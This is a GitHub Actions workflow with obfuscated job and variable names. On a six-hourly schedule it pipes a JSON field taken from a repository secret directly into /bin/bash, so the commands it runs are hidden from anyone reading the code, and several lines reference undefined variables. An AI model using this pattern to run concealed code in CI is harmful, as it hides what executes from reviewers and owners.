name: caocao19870104

on:
  workflow_dispatch:
  schedule:
    - cron: '1 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: caocao19870104
        env:
          tkv3451: ${{ secrets.tkv3451 }}
        run: |
          echo $tkv3451 | jq -r .bkf79292 | /bin/bash
          echo $bo85092 | jq -r .gvfuc9094 | /bin/bash
          echo $smwpf9189 | jq -r .s081 | /bin/bash
          echo $wqux36956 | jq -r .izvnv70 | /bin/bash
          echo $a7114 | jq -r .whwyb71598 | /bin/bash
          echo $yr78147 | jq -r .iwx07764 | /bin/bash

